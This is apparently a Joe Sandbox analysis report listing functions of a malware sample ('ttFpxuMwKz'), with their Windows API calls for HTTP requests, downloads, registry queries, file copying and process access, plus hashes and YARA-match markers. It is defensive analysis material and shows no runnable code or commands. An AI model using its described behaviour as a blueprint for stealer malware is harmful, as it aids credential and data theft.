                                    • API String ID: 1008454911-0
                                    • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                    • Instruction ID: 7cb8ca595f561429de0f029a9c0edd12ef2c9cc99d7a6d6185c3db2bb73808e4
                                    • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                    • Instruction Fuzzy Hash: 3A31E7B4A40218EBDB20CF94DC89BDCB7B5FB48704F5081D9E709A7281D7746A858F59
                                    Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                    • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                    • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                    • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                    • InternetCloseHandle.WININET(?), ref: 004050C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 3894370878-0
                                    • Opcode ID: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                    • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                    • Opcode Fuzzy Hash: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                    • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                    Function 007F5777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 007F58AB
                                    • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 007F5908
                                    • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 007F5ABE
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 007F548F
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 007F557F
                                      • Part of subcall function 007F5527: lstrlen.KERNEL32(00000000), ref: 007F5596
                                      • Part of subcall function 007F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 007F55CB
                                      • Part of subcall function 007F5527: lstrlen.KERNEL32(00000000), ref: 007F55EA
                                      • Part of subcall function 007F5527: strtok.MSVCRT(00000000,?), ref: 007F5605
                                      • Part of subcall function 007F5527: lstrlen.KERNEL32(00000000), ref: 007F5615
                                    • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 007F59F2
                                    • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 007F5BA7
                                    • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 007F5C73
                                    • Sleep.KERNEL32(0000EA60), ref: 007F5C82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                    • String ID:
                                    • API String ID: 3630751533-0
                                    • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                    • Instruction ID: 1e1068383d9630962c7ef7f62c90b1cede7cde444e5fabb5c7aa9c5e53c2141e
                                    • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                    • Instruction Fuzzy Hash: B9E10FB190020CEACB18FBA0DD9ADFD7379AF55300F50C168B64A56291EF786B4CCB52
                                    Function 007E1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 007E158E
                                      • Part of subcall function 007E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E151B
                                      • Part of subcall function 007E1507: RtlAllocateHeap.NTDLL(00000000), ref: 007E1522
                                      • Part of subcall function 007E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E153E
                                      • Part of subcall function 007E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E155C
                                      • Part of subcall function 007E1507: RegCloseKey.ADVAPI32(?), ref: 007E1566
                                    • lstrcat.KERNEL32(?,00000000), ref: 007E15B6
                                    • lstrlen.KERNEL32(?), ref: 007E15C3
                                    • lstrcat.KERNEL32(?,004262EC), ref: 007E15DE
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 007E16CC
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                      • Part of subcall function 007E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                      • Part of subcall function 007E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                      • Part of subcall function 007E9C27: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                      • Part of subcall function 007E9C27: LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                      • Part of subcall function 007E9C27: CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                    • DeleteFileA.KERNEL32(00000000), ref: 007E1756
                                    • memset.MSVCRT ref: 007E177D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID:
                                    • API String ID: 3885987321-0
                                    • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                    • Instruction ID: 3c56daf5e626ddec273cff0fd7809bbc5c74b596a4458e1dcf16ee39091498f5
                                    • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                    • Instruction Fuzzy Hash: C1513EB1940218EBCB15FB60DD96EFD7378AF54300F4041A8B70E62182EE785B89CE66
                                    Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                    • wsprintfA.USER32 ref: 00418459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,00A19940,00000000,000F003F,?,00000400), ref: 004184EC
                                    • lstrlenA.KERNEL32(?), ref: 00418501
                                    • RegQueryValueExA.ADVAPI32(00000000,00A19970,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                    • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                    • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                    • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                    Function 007E4A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                    • Instruction ID: 9609bd1d87150249e719ced9e48386f459193661c3168745e42c101ca9284d60
                                    • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                    • Instruction Fuzzy Hash: BD2129B5D00219ABDF14DFA4E849AED7B74FF44321F108225F929A7290EB746A05CF91
                                    Function 007F78F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F790B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7912
                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 007F7944
                                    • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 007F7965
                                    • RegCloseKey.ADVAPI32(00000000), ref: 007F796F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction ID: c0af3ecfc1cfe13cd0de9bda0f35f5489ca25c74be814294f3072938a60a5cb9
                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction Fuzzy Hash: 68012CB9A84208FBEB04DBE4DD49FADB7B9EB48701F109154BA0596281D6B4A900CB51
                                    Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                    • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A15530,00000000,00020119,00000000), ref: 004176DD
                                    • RegQueryValueExA.ADVAPI32(00000000,00A197F0,00000000,00000000,?,000000FF), ref: 004176FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3466090806-2517555085
                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                    Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                    • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A15530,00000000,00020119,004176B9), ref: 0041775B
                                    • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                    • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3466090806-1022791448
                                    • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                    • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                    • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                    • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                    Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                    • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: :A$:A
                                    • API String ID: 1378416451-1974578005
                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                    Function 007E7537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E75A1
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7618
                                    • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 007E7674
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E76B9
                                    • HeapFree.KERNEL32(00000000), ref: 007E76C0
                                      • Part of subcall function 007E94A7: vsprintf_s.MSVCRT ref: 007E94C2
                                    • task.LIBCPMTD ref: 007E77BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                    • String ID:
                                    • API String ID: 700816787-0
                                    • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                    • Instruction ID: ae8b74682c015c64db762c57a2c7d1ba362f203ca2b3762c0c62875a0f99d736
                                    • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                    • Instruction Fuzzy Hash: 97612BB59052A8DBDB24DB50CC45FE9B7B8BF48300F0081E9E649A6141EFB45BC5CF91
                                    Function 007F5527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 007E6548
                                      • Part of subcall function 007E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 007E656A
                                      • Part of subcall function 007E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E659C
                                      • Part of subcall function 007E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E65EC
                                      • Part of subcall function 007E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E6626
                                      • Part of subcall function 007E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6638
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 007F557F
                                    • lstrlen.KERNEL32(00000000), ref: 007F5596
                                      • Part of subcall function 007F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F90B9
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 007F55CB
                                    • lstrlen.KERNEL32(00000000), ref: 007F55EA
                                    • strtok.MSVCRT(00000000,?), ref: 007F5605
                                    • lstrlen.KERNEL32(00000000), ref: 007F5615
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                    • String ID:
                                    • API String ID: 3532888709-0
                                    • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                    • Instruction ID: 617710821f58a8b08de274ef28231a2eeda33200ef4ba29b4c628da0db4c27c4
                                    • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                    • Instruction Fuzzy Hash: D851CCB091024CEBCB18FF60CEAAEFD7775AF14300F908118F60956691DB386B49CB52
                                    Function 007F7337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 007F7345
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,007F7574,004205BD), ref: 007F7383
                                    • memset.MSVCRT ref: 007F73D1
                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 007F7525
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenProcesslstrcpymemset
                                    • String ID:
                                    • API String ID: 224852652-0
                                    • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                    • Instruction ID: 6567102696191ec87767a210e1d218246309d6ac11bb516d24e026504c938a18
                                    • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                    • Instruction Fuzzy Hash: 3C5160B0D0421CEBDB18EBA0DC95BFDB774AF44305F5081A9E70967281EB786A88CF55
                                    Function 007F4317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 007F433C
                                    • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 007F435B
                                    • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 007F437F
                                    • RegCloseKey.ADVAPI32(?), ref: 007F4389
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F43AE
                                    • lstrcat.KERNEL32(?,0064A168), ref: 007F43C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                    • Instruction ID: f408e44ad82093f2e262eaf84fe105b6b6b17dba5e30ee337fd6f1a00322b041
                                    • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                    • Instruction Fuzzy Hash: 4141B3BA94010CBBDB14EBE0DC4AFFE7379AB4D700F004558B71557180EA795A988BE2
                                    Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 004140D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,00A19F80,00000000,00020119,?), ref: 004140F4
                                    • RegQueryValueExA.ADVAPI32(?,00A1A918,00000000,00000000,00000000,000000FF), ref: 00414118
                                    • RegCloseKey.ADVAPI32(?), ref: 00414122
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                    • lstrcatA.KERNEL32(?,00A1A8B8), ref: 0041415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                    • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                    • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                    • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                    Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
